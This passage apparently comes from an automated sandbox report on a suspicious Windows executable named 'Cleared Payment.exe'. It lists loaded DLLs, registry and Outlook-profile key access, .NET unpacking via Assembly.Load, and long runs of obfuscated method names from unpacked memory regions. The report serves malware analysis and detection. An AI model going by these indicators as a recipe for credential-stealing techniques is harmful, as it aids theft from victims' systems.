                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Cleared Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Cleared Payment.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: Cleared Payment.exe, frmFolderSearcher.cs.Net Code: InitializeComponent
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.cs.Net Code: X0bl7sZpNw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.cs.Net Code: X0bl7sZpNw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.cs.Net Code: X0bl7sZpNw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Cleared Payment.exe.25aad94.1.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_0860F21F pushfd ; ret 0_2_0860F222
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 0_2_0860FC98 push 000000C3h; ret 0_2_0860FCEF
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BCFEE0 pushfd ; retf 0006h4_2_02BCFEE1
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_02BC0C95 push edi; ret 4_2_02BC0CC2
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BA8498 push ss; retf 0006h4_2_06BA849A
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BA8508 push ss; retf 0006h4_2_06BA850A
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAE9A1 push eax; retf 0006h4_2_06BAE9A2
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAE920 push eax; retf 0006h4_2_06BAE922
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BA7C99 push cs; retf 0006h4_2_06BA7C9A
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BA7D69 push cs; retf 0006h4_2_06BA7D6A
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB95 push es; iretd 4_2_06BAFBCC
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFBD5 push es; iretd 4_2_06BAFBDC
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFBCD push es; iretd 4_2_06BAFBD4
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB23 push es; iretd 4_2_06BAFB24
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB10 push es; iretd 4_2_06BAFB20
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB7F push es; iretd 4_2_06BAFB88
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB6D push es; iretd 4_2_06BAFB7C
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB5F push es; iretd 4_2_06BAFB6C
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB55 push es; iretd 4_2_06BAFB5C
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BAFB44 push es; iretd 4_2_06BAFB54
                      Source: C:\Users\user\Desktop\Cleared Payment.exeCode function: 4_2_06BBFEDF push es; ret 4_2_06BBFEE0
                      Source: Cleared Payment.exeStatic PE information: section name: .text entropy: 7.942915720013936
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, Bw6dSiwvl7k56E7yNY.csHigh entropy of concatenated method names: 'UuBO6lX7xS', 'AXsOhMVC6i', 'wioOUkA288', 'wUXOjGAvyx', 'f48OeZkmtB', 'Oj8O5MZW4U', 'nFlOff1j2Y', 'nGiOQ2PTC5', 'v0JO9vlLAH', 'YkIOogj3Ey'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, nFbQTR416tkrbLUl62.csHigh entropy of concatenated method names: 'FFo8nuUab6o8O6vY4LS', 'SMyQcAU4WMmIiDX16ix', 'ywrXJtgN0F', 'TV7XKFLNHL', 'qcbXP0Hxv9', 'WnHD8rUrwCQebmBkLnK', 'gxx2OjUdh1fyAlQWNZ8'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.csHigh entropy of concatenated method names: 'MvVriLCaHd', 'qTirRvAPrq', 'zYorIGD9KK', 'mWQr4kM5DV', 'h3PrnFnmCO', 'nJ8rXMw0vN', 'ar6rs5sCkM', 'LbZrbWeSxq', 'njPrAIYFig', 'kdmrMAYj5w'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, KTaly5jXM3x64DwGA0h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPrP1qcLUj', 'g1CPW0mr9S', 'xlfPEiVMt8', 'kQtPLDP6u7', 'yXFPFUXSWw', 'kZdPDV8XsC', 'vRLPmKpybX'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, Xs8DB3MgZk0T2wHAoR.csHigh entropy of concatenated method names: 'gWLBsnBjoo', 'gnIBbxQcUU', 'UnIBM0P8yx', 'V6aB8jAWcO', 'HcyBNNbl9O', 'AUrBa0sQWR', 'VjDeRoCr5pHo6v5QyW', 'WA4y8tK6yBYNLpA3BO', 'tQbBBntChP', 'EgABr47Yf6'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, uY63p1y65D1YwVBHkc.csHigh entropy of concatenated method names: 'ToString', 'ILNaoDNqhO', 'Yjsajm0CwT', 'Anma0f3FbY', 'R6raerOOMQ', 'FoMa57p1T7', 'X0daZeXZhx', 'eoHafAM2Qa', 'HipaQEFGxt', 's3iagYG7Ck'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, OIASNCKV7Cqca4to4f.csHigh entropy of concatenated method names: 'jhcXitJbj9', 'NlNXIsRVaQ', 'RBaXnP60XD', 'i8cXsIhS80', 'HGSXbRSAmu', 'wH5nFuIbtV', 'Au9nDYEqJx', 'uQrnmxCCRb', 'OZUn3CFy30', 'WvYnpR24vN'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, QC2Q8osbJXEbt9Chsn.csHigh entropy of concatenated method names: 'e0iN9tp4EX', 'HbjNwZ4XDW', 'l1UN1kbAsv', 'lI3NW9QiYD', 'sfHNjwGLd9', 'DwLN0s5Hdu', 'gnBNe4U2yZ', 'QChN5JaDtO', 'qMBNZRVDu6', 'Iy8NfZ76Bv'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, zFTePL77FIdYa78VE3.csHigh entropy of concatenated method names: 'eAGT3lcwLM', 'VgMTCZOm0C', 'UGaJGtIycR', 'z78JBabvXy', 'oqUTouMYJn', 't0lTwOqxWV', 'L3qTxmRIdA', 'YgWT1itv04', 'MQvTWHityO', 'uaITEBjerg'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, oLMqPH3sBs34Mf964Q.csHigh entropy of concatenated method names: 'oQ64qrByg9', 'bBq4kj2vOP', 'pdZ46kuMa3', 'oJg4hssYcQ', 'I2S4N9OHy9', 'wri4atrf8Z', 'xbG4T4uECr', 'M024JdyFd1', 'xby4KwkHEp', 'k6J4P04sCf'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, sc771bRe0eO1bpWvGt.csHigh entropy of concatenated method names: 'haiI1vAQYR', 't5DIWXZVhK', 'l7mIEFMZC8', 'eQtILQxoVL', 'I0bIFuHi7r', 'ssjIDjR1pO', 'Q2VIm9Qlej', 'WomI3Usj6Y', 'xvGIp9jmaC', 'BULICDPocL'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, BPvQD6dsfOa5feW64x.csHigh entropy of concatenated method names: 'Dispose', 'PqLBp10PLW', 'JZBVj0s3Ol', 'eHEuuKd91i', 'PQJBCHPto6', 'lFeBzdE2OO', 'ProcessDialogKey', 'YFlVGZGvQ0', 's9OVBTDp1t', 'GdtVVVvQEp'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, jP9Ou9nv5DuTJx91NB.csHigh entropy of concatenated method names: 'wHQsRTjGf2', 'qWCs4WChTD', 'btqsXTRwUL', 'IwkXCUajUE', 'c2MXzdn1kq', 'R7vsGXkXFh', 'wMUsBY1wQS', 'ocVsVE3o4k', 'IDtsr2cbRI', 'hCyslZeme1'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, U4RRRIArA3rXPUCl8Y.csHigh entropy of concatenated method names: 'yQjJU5ShN8', 'wtcJjdNIwG', 'l9wJ0upsfY', 'miQJeQuGmw', 'K94J1nn4kb', 'TpxJ5kigGc', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, nNsJw1uDfVyw7WHvxZ.csHigh entropy of concatenated method names: 'HgO72N9mX', 'EouqRjWMg', 'ARLkt30Ar', 'tFc2qWwjK', 'K0jhVZA8i', 'mW3YvljYp', 'GM1ZPyfN9NTKcL7g6X', 'cbRGp6RgLIPkdVrY0P', 's9GJt974i', 'RxCP6dRRV'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, m2rgQnUJDx3OEdh7mL.csHigh entropy of concatenated method names: 'qOnKBgNxv5', 'YsJKrMGQVN', 'VZLKlUOSBD', 'oBIKRqVIys', 'NiuKI6PEPJ', 'oLYKnTABWR', 'LZZKX771Bu', 'vbXJmS6a8L', 'rqGJ3X0WXA', 'rjUJpBCNvQ'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, rKVfKv0gpHmH6QEa9c.csHigh entropy of concatenated method names: 'K63nSnGyUU', 'fgIn2jNOst', 'oAm40OqI7H', 'X2Q4eSA0sD', 'g5f45TLpqn', 'IkP4ZvGleP', 's8g4fZ21Q9', 'H5k4QSSDv4', 'ucL4gKh7QO', 'a0V49lugYl'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, IUtqZK55qGo14liVk3.csHigh entropy of concatenated method names: 'O18sttUkD9', 't0CsvlbYnk', 'C2qs7no0II', 'aJlsq8XcOq', 'owlsSBDCuJ', 'Im4sk70xAZ', 'sBgs23hwNa', 'urYs6bPiMo', 'qUVshahlwK', 'hZLsY5mV8Z'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, DNZJZS1XXTp5Gof1dS.csHigh entropy of concatenated method names: 'dwgJRDH81K', 't19JIiHUn1', 'ULmJ4y8oYo', 'sIUJnKMxdi', 'xtgJXJNDJZ', 'gDrJsUYJp8', 'WiSJbRSsvy', 'wVxJAjRAPB', 'JWfJM6IyoE', 'bfXJ8jQnmF'
                      Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, HKvQe0jcuJArh70EuSf.csHigh entropy of concatenated method names: 'ctMKtVph8I', 'XAtKvDCS5O', 'M1QK7xRuPa', 'uLLKqpiCT5', 'DXkKSrtqWv', 'AehKkhsgYk', 'LsRK2uqSdQ', 'BW8K6XPtQe', 'i85KheDYd6', 'BUYKYKQkt6'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, Bw6dSiwvl7k56E7yNY.csHigh entropy of concatenated method names: 'UuBO6lX7xS', 'AXsOhMVC6i', 'wioOUkA288', 'wUXOjGAvyx', 'f48OeZkmtB', 'Oj8O5MZW4U', 'nFlOff1j2Y', 'nGiOQ2PTC5', 'v0JO9vlLAH', 'YkIOogj3Ey'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, nFbQTR416tkrbLUl62.csHigh entropy of concatenated method names: 'FFo8nuUab6o8O6vY4LS', 'SMyQcAU4WMmIiDX16ix', 'ywrXJtgN0F', 'TV7XKFLNHL', 'qcbXP0Hxv9', 'WnHD8rUrwCQebmBkLnK', 'gxx2OjUdh1fyAlQWNZ8'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.csHigh entropy of concatenated method names: 'MvVriLCaHd', 'qTirRvAPrq', 'zYorIGD9KK', 'mWQr4kM5DV', 'h3PrnFnmCO', 'nJ8rXMw0vN', 'ar6rs5sCkM', 'LbZrbWeSxq', 'njPrAIYFig', 'kdmrMAYj5w'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, KTaly5jXM3x64DwGA0h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPrP1qcLUj', 'g1CPW0mr9S', 'xlfPEiVMt8', 'kQtPLDP6u7', 'yXFPFUXSWw', 'kZdPDV8XsC', 'vRLPmKpybX'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, Xs8DB3MgZk0T2wHAoR.csHigh entropy of concatenated method names: 'gWLBsnBjoo', 'gnIBbxQcUU', 'UnIBM0P8yx', 'V6aB8jAWcO', 'HcyBNNbl9O', 'AUrBa0sQWR', 'VjDeRoCr5pHo6v5QyW', 'WA4y8tK6yBYNLpA3BO', 'tQbBBntChP', 'EgABr47Yf6'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, uY63p1y65D1YwVBHkc.csHigh entropy of concatenated method names: 'ToString', 'ILNaoDNqhO', 'Yjsajm0CwT', 'Anma0f3FbY', 'R6raerOOMQ', 'FoMa57p1T7', 'X0daZeXZhx', 'eoHafAM2Qa', 'HipaQEFGxt', 's3iagYG7Ck'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, OIASNCKV7Cqca4to4f.csHigh entropy of concatenated method names: 'jhcXitJbj9', 'NlNXIsRVaQ', 'RBaXnP60XD', 'i8cXsIhS80', 'HGSXbRSAmu', 'wH5nFuIbtV', 'Au9nDYEqJx', 'uQrnmxCCRb', 'OZUn3CFy30', 'WvYnpR24vN'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, QC2Q8osbJXEbt9Chsn.csHigh entropy of concatenated method names: 'e0iN9tp4EX', 'HbjNwZ4XDW', 'l1UN1kbAsv', 'lI3NW9QiYD', 'sfHNjwGLd9', 'DwLN0s5Hdu', 'gnBNe4U2yZ', 'QChN5JaDtO', 'qMBNZRVDu6', 'Iy8NfZ76Bv'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, zFTePL77FIdYa78VE3.csHigh entropy of concatenated method names: 'eAGT3lcwLM', 'VgMTCZOm0C', 'UGaJGtIycR', 'z78JBabvXy', 'oqUTouMYJn', 't0lTwOqxWV', 'L3qTxmRIdA', 'YgWT1itv04', 'MQvTWHityO', 'uaITEBjerg'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, oLMqPH3sBs34Mf964Q.csHigh entropy of concatenated method names: 'oQ64qrByg9', 'bBq4kj2vOP', 'pdZ46kuMa3', 'oJg4hssYcQ', 'I2S4N9OHy9', 'wri4atrf8Z', 'xbG4T4uECr', 'M024JdyFd1', 'xby4KwkHEp', 'k6J4P04sCf'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, sc771bRe0eO1bpWvGt.csHigh entropy of concatenated method names: 'haiI1vAQYR', 't5DIWXZVhK', 'l7mIEFMZC8', 'eQtILQxoVL', 'I0bIFuHi7r', 'ssjIDjR1pO', 'Q2VIm9Qlej', 'WomI3Usj6Y', 'xvGIp9jmaC', 'BULICDPocL'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, BPvQD6dsfOa5feW64x.csHigh entropy of concatenated method names: 'Dispose', 'PqLBp10PLW', 'JZBVj0s3Ol', 'eHEuuKd91i', 'PQJBCHPto6', 'lFeBzdE2OO', 'ProcessDialogKey', 'YFlVGZGvQ0', 's9OVBTDp1t', 'GdtVVVvQEp'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, jP9Ou9nv5DuTJx91NB.csHigh entropy of concatenated method names: 'wHQsRTjGf2', 'qWCs4WChTD', 'btqsXTRwUL', 'IwkXCUajUE', 'c2MXzdn1kq', 'R7vsGXkXFh', 'wMUsBY1wQS', 'ocVsVE3o4k', 'IDtsr2cbRI', 'hCyslZeme1'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, U4RRRIArA3rXPUCl8Y.csHigh entropy of concatenated method names: 'yQjJU5ShN8', 'wtcJjdNIwG', 'l9wJ0upsfY', 'miQJeQuGmw', 'K94J1nn4kb', 'TpxJ5kigGc', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, nNsJw1uDfVyw7WHvxZ.csHigh entropy of concatenated method names: 'HgO72N9mX', 'EouqRjWMg', 'ARLkt30Ar', 'tFc2qWwjK', 'K0jhVZA8i', 'mW3YvljYp', 'GM1ZPyfN9NTKcL7g6X', 'cbRGp6RgLIPkdVrY0P', 's9GJt974i', 'RxCP6dRRV'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, m2rgQnUJDx3OEdh7mL.csHigh entropy of concatenated method names: 'qOnKBgNxv5', 'YsJKrMGQVN', 'VZLKlUOSBD', 'oBIKRqVIys', 'NiuKI6PEPJ', 'oLYKnTABWR', 'LZZKX771Bu', 'vbXJmS6a8L', 'rqGJ3X0WXA', 'rjUJpBCNvQ'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, rKVfKv0gpHmH6QEa9c.csHigh entropy of concatenated method names: 'K63nSnGyUU', 'fgIn2jNOst', 'oAm40OqI7H', 'X2Q4eSA0sD', 'g5f45TLpqn', 'IkP4ZvGleP', 's8g4fZ21Q9', 'H5k4QSSDv4', 'ucL4gKh7QO', 'a0V49lugYl'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, IUtqZK55qGo14liVk3.csHigh entropy of concatenated method names: 'O18sttUkD9', 't0CsvlbYnk', 'C2qs7no0II', 'aJlsq8XcOq', 'owlsSBDCuJ', 'Im4sk70xAZ', 'sBgs23hwNa', 'urYs6bPiMo', 'qUVshahlwK', 'hZLsY5mV8Z'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, DNZJZS1XXTp5Gof1dS.csHigh entropy of concatenated method names: 'dwgJRDH81K', 't19JIiHUn1', 'ULmJ4y8oYo', 'sIUJnKMxdi', 'xtgJXJNDJZ', 'gDrJsUYJp8', 'WiSJbRSsvy', 'wVxJAjRAPB', 'JWfJM6IyoE', 'bfXJ8jQnmF'
                      Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, HKvQe0jcuJArh70EuSf.csHigh entropy of concatenated method names: 'ctMKtVph8I', 'XAtKvDCS5O', 'M1QK7xRuPa', 'uLLKqpiCT5', 'DXkKSrtqWv', 'AehKkhsgYk', 'LsRK2uqSdQ', 'BW8K6XPtQe', 'i85KheDYd6', 'BUYKYKQkt6'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, Bw6dSiwvl7k56E7yNY.csHigh entropy of concatenated method names: 'UuBO6lX7xS', 'AXsOhMVC6i', 'wioOUkA288', 'wUXOjGAvyx', 'f48OeZkmtB', 'Oj8O5MZW4U', 'nFlOff1j2Y', 'nGiOQ2PTC5', 'v0JO9vlLAH', 'YkIOogj3Ey'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, nFbQTR416tkrbLUl62.csHigh entropy of concatenated method names: 'FFo8nuUab6o8O6vY4LS', 'SMyQcAU4WMmIiDX16ix', 'ywrXJtgN0F', 'TV7XKFLNHL', 'qcbXP0Hxv9', 'WnHD8rUrwCQebmBkLnK', 'gxx2OjUdh1fyAlQWNZ8'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.csHigh entropy of concatenated method names: 'MvVriLCaHd', 'qTirRvAPrq', 'zYorIGD9KK', 'mWQr4kM5DV', 'h3PrnFnmCO', 'nJ8rXMw0vN', 'ar6rs5sCkM', 'LbZrbWeSxq', 'njPrAIYFig', 'kdmrMAYj5w'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, KTaly5jXM3x64DwGA0h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPrP1qcLUj', 'g1CPW0mr9S', 'xlfPEiVMt8', 'kQtPLDP6u7', 'yXFPFUXSWw', 'kZdPDV8XsC', 'vRLPmKpybX'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, Xs8DB3MgZk0T2wHAoR.csHigh entropy of concatenated method names: 'gWLBsnBjoo', 'gnIBbxQcUU', 'UnIBM0P8yx', 'V6aB8jAWcO', 'HcyBNNbl9O', 'AUrBa0sQWR', 'VjDeRoCr5pHo6v5QyW', 'WA4y8tK6yBYNLpA3BO', 'tQbBBntChP', 'EgABr47Yf6'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, uY63p1y65D1YwVBHkc.csHigh entropy of concatenated method names: 'ToString', 'ILNaoDNqhO', 'Yjsajm0CwT', 'Anma0f3FbY', 'R6raerOOMQ', 'FoMa57p1T7', 'X0daZeXZhx', 'eoHafAM2Qa', 'HipaQEFGxt', 's3iagYG7Ck'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, OIASNCKV7Cqca4to4f.csHigh entropy of concatenated method names: 'jhcXitJbj9', 'NlNXIsRVaQ', 'RBaXnP60XD', 'i8cXsIhS80', 'HGSXbRSAmu', 'wH5nFuIbtV', 'Au9nDYEqJx', 'uQrnmxCCRb', 'OZUn3CFy30', 'WvYnpR24vN'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, QC2Q8osbJXEbt9Chsn.csHigh entropy of concatenated method names: 'e0iN9tp4EX', 'HbjNwZ4XDW', 'l1UN1kbAsv', 'lI3NW9QiYD', 'sfHNjwGLd9', 'DwLN0s5Hdu', 'gnBNe4U2yZ', 'QChN5JaDtO', 'qMBNZRVDu6', 'Iy8NfZ76Bv'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, zFTePL77FIdYa78VE3.csHigh entropy of concatenated method names: 'eAGT3lcwLM', 'VgMTCZOm0C', 'UGaJGtIycR', 'z78JBabvXy', 'oqUTouMYJn', 't0lTwOqxWV', 'L3qTxmRIdA', 'YgWT1itv04', 'MQvTWHityO', 'uaITEBjerg'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, oLMqPH3sBs34Mf964Q.csHigh entropy of concatenated method names: 'oQ64qrByg9', 'bBq4kj2vOP', 'pdZ46kuMa3', 'oJg4hssYcQ', 'I2S4N9OHy9', 'wri4atrf8Z', 'xbG4T4uECr', 'M024JdyFd1', 'xby4KwkHEp', 'k6J4P04sCf'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, sc771bRe0eO1bpWvGt.csHigh entropy of concatenated method names: 'haiI1vAQYR', 't5DIWXZVhK', 'l7mIEFMZC8', 'eQtILQxoVL', 'I0bIFuHi7r', 'ssjIDjR1pO', 'Q2VIm9Qlej', 'WomI3Usj6Y', 'xvGIp9jmaC', 'BULICDPocL'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, BPvQD6dsfOa5feW64x.csHigh entropy of concatenated method names: 'Dispose', 'PqLBp10PLW', 'JZBVj0s3Ol', 'eHEuuKd91i', 'PQJBCHPto6', 'lFeBzdE2OO', 'ProcessDialogKey', 'YFlVGZGvQ0', 's9OVBTDp1t', 'GdtVVVvQEp'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, jP9Ou9nv5DuTJx91NB.csHigh entropy of concatenated method names: 'wHQsRTjGf2', 'qWCs4WChTD', 'btqsXTRwUL', 'IwkXCUajUE', 'c2MXzdn1kq', 'R7vsGXkXFh', 'wMUsBY1wQS', 'ocVsVE3o4k', 'IDtsr2cbRI', 'hCyslZeme1'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, U4RRRIArA3rXPUCl8Y.csHigh entropy of concatenated method names: 'yQjJU5ShN8', 'wtcJjdNIwG', 'l9wJ0upsfY', 'miQJeQuGmw', 'K94J1nn4kb', 'TpxJ5kigGc', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, nNsJw1uDfVyw7WHvxZ.csHigh entropy of concatenated method names: 'HgO72N9mX', 'EouqRjWMg', 'ARLkt30Ar', 'tFc2qWwjK', 'K0jhVZA8i', 'mW3YvljYp', 'GM1ZPyfN9NTKcL7g6X', 'cbRGp6RgLIPkdVrY0P', 's9GJt974i', 'RxCP6dRRV'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, m2rgQnUJDx3OEdh7mL.csHigh entropy of concatenated method names: 'qOnKBgNxv5', 'YsJKrMGQVN', 'VZLKlUOSBD', 'oBIKRqVIys', 'NiuKI6PEPJ', 'oLYKnTABWR', 'LZZKX771Bu', 'vbXJmS6a8L', 'rqGJ3X0WXA', 'rjUJpBCNvQ'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, rKVfKv0gpHmH6QEa9c.csHigh entropy of concatenated method names: 'K63nSnGyUU', 'fgIn2jNOst', 'oAm40OqI7H', 'X2Q4eSA0sD', 'g5f45TLpqn', 'IkP4ZvGleP', 's8g4fZ21Q9', 'H5k4QSSDv4', 'ucL4gKh7QO', 'a0V49lugYl'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, IUtqZK55qGo14liVk3.csHigh entropy of concatenated method names: 'O18sttUkD9', 't0CsvlbYnk', 'C2qs7no0II', 'aJlsq8XcOq', 'owlsSBDCuJ', 'Im4sk70xAZ', 'sBgs23hwNa', 'urYs6bPiMo', 'qUVshahlwK', 'hZLsY5mV8Z'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, DNZJZS1XXTp5Gof1dS.csHigh entropy of concatenated method names: 'dwgJRDH81K', 't19JIiHUn1', 'ULmJ4y8oYo', 'sIUJnKMxdi', 'xtgJXJNDJZ', 'gDrJsUYJp8', 'WiSJbRSsvy', 'wVxJAjRAPB', 'JWfJM6IyoE', 'bfXJ8jQnmF'
                      Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, HKvQe0jcuJArh70EuSf.csHigh entropy of concatenated method names: 'ctMKtVph8I', 'XAtKvDCS5O', 'M1QK7xRuPa', 'uLLKqpiCT5', 'DXkKSrtqWv', 'AehKkhsgYk', 'LsRK2uqSdQ', 'BW8K6XPtQe', 'i85KheDYd6', 'BUYKYKQkt6'
